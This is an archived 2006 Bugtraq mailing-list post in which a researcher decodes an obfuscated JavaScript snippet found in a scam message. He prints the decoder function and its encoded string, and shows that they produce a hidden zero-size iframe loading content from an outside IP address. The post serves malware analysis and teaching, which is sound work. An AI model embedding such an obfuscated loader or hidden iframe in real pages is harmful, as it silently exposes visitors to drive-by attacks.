lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 18 Feb 2006 10:18:35 -0500 (EST)
From: Jose Nazario <jose@...key.org>
To: gandalf@...ital.net
Cc: bugtraq@...urityfocus.com
Subject: Re: Java script exploit


ps, this decodes to the following HTML snippet (i have deliberately
obfuscated the tags):

[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]

here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
port for OpenBSD years ago, and the source is available for all at

        http://www.njs-javascript.org/

i extracted the javascript functions from the forwarded message and loaded
it into a file, bad2.js:

$ cat bad2.js
function dc(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49
,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9
,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,
39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r)		// JN no document object
print(r);			// JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT')

i made some modifications to deal with the fact that there is no document
object in this context. see the "JN" comments. now when i use the
javascript toolkit, i can acutally run it. it will print the decoded
string object 'r':


$ js bad2.js
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]


(tags obfuscated) this is what your browser would see and load. unless
your spam/scam detection engine also ran the javascript, it wouldn't see
that. hence, obfuscation.

hopefully this helps people out there decode questionable javasript in the
future.

________
jose nazario, ph.d.			jose@...key.org
http://monkey.org/~jose/ 		http://infosecdaily.net/
					http://www.wormblog.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ